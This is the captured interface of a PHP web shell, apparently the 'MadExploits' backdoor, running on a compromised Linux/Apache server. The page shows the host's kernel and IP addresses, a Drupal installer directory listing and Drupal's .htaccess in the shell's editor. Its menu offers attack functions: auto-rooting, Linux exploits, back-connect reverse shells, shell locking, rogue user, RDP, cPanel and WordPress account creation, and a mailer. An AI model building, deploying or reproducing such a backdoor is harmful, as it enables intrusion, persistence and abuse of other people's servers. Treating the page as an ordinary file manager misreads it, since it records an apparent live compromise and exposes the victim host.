Linux server1.sbs.cy 5.14.0-362.18.1.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jan 29 07:05:48 EST 2024 x86_64
Apache
: 199.192.25.12 | : 172.69.59.12
28 Domain
8.1.31
administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
softaculous /
drupal10 /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.htaccess
685
B
-rw-r--r--
NOTES.txt
2.03
KB
-rw-r--r--
README.txt
278
B
-rw-r--r--
_htaccess
486
B
-rw-r--r--
clone.php
14.3
KB
-rw-r--r--
edit.php
5.05
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
14.86
KB
-rw-r--r--
fileindex.php
271
B
-rw-r--r--
import.php
5.68
KB
-rw-r--r--
info.xml
3.92
KB
-rw-r--r--
install.js
1.32
KB
-rw-r--r--
install.php
9.44
KB
-rw-r--r--
install.xml
1.1
KB
-rw-r--r--
md5
1.45
KB
-rw-r--r--
settings.php
36.13
KB
-rw-r--r--
update_pass.php
541
B
-rw-r--r--
upgrade.php
4.46
KB
-rw-r--r--
upgrade.xml
309
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .htaccess
# Deny all requests from Apache 2.4+. <IfModule mod_authz_core.c> Require all denied </IfModule> # Deny all requests from Apache 2.0-2.2. <IfModule !mod_authz_core.c> Deny from all </IfModule> # Turn off all options we don't need. Options -Indexes -ExecCGI -Includes -MultiViews # Set the catch-all handler to prevent scripts from being executed. SetHandler Drupal_Security_Do_Not_Remove_See_SA_2006_006 <Files *> # Override the handler again if we're run later in the evaluation list. SetHandler Drupal_Security_Do_Not_Remove_See_SA_2013_003 </Files> # If we know how to do it safely, disable the PHP engine entirely. <IfModule mod_php.c> php_flag engine off </IfModule>
Close